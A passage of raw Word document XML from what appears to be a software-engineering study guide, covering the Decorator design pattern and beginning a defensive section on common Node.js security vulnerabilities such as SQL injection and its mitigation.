          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Component Interface (Coffee)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines the interface (cost()) that must be implemented by the concrete component (SimpleCoffee) and decorators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A5AA3E" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Component (SimpleCoffee)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implements the Coffee interface and provides the base behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7880CB3C" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decorator (CoffeeDecorator)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Holds a reference to a Coffee object and delegates calls to it, while also allowing behavior to be added by concrete decorators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0001BE47" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Decorators (MilkDecorator, SugarDecorator, VanillaDecorator)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Extend CoffeeDecorator and add specific behaviors (e.g., cost increase) by overriding the cost() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DED5879" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Characteristics of the Decorator Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7567FA03" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Flexible Extensibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Allows behavior to be added to individual objects without affecting other instances of the same class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF4DE9" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoids Subclass Explosion</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Eliminates the need to create a large number of subclasses to support every possible combination of behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678CB131" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Open/Closed Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: New decorators can be added without modifying existing code, making the system open for extension but closed for modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76A4EE" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Advantages of the Decorator Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2092A" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Runtime Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: New responsibilities can be added to objects at runtime, allowing for dynamic behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30466DC5" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Combining Behaviors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Multiple decorators can be applied to a single object to combine their behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EDEC6B" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single Responsibility Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Each decorator class has a single responsibility, making the code more maintainable and easier to understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A939424" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disadvantages of the Decorator Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA73007" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The pattern introduces additional classes, which can make the code more complex and harder to understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA3543" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Order Sensitivity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The order in which decorators are applied can affect the final behavior, which may lead to subtle bugs if not managed carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A3870" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Difficult Debugging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Since decorators can wrap each other, debugging the flow of execution can be challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2123E626" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Common Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794101E3" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GUI Toolkits</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Extending the functionality of visual components, such as adding borders, scrollbars, or shadows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2699C" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I/O Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Wrapping input and output streams with additional functionality, such as buffering, compression, or encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA6128" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Adding logging functionality to an existing object without altering its code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632741C2" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFBB267" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="00BB2F17" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A6AEE3" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc178383336"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236808FE" w14:textId="669A120E" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc178383337"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are some common security vulnerabilities in Node.js applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w14:paraId="27396A3E" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js applications can be susceptible to various security vulnerabilities. Understanding these common issues and implementing appropriate measures to mitigate them is crucial for securing your applications. Here are some of the most common security vulnerabilities in Node.js applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AD97E6"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1. Injection Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA9486A" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="520"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Occurs when user input is improperly sanitized before being used in SQL queries. Attackers can manipulate SQL queries to gain unauthorized access or modify data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4BFFFF" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="520"/>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Use parameterized queries or ORM libraries that automatically handle input sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8AC48" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="520"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
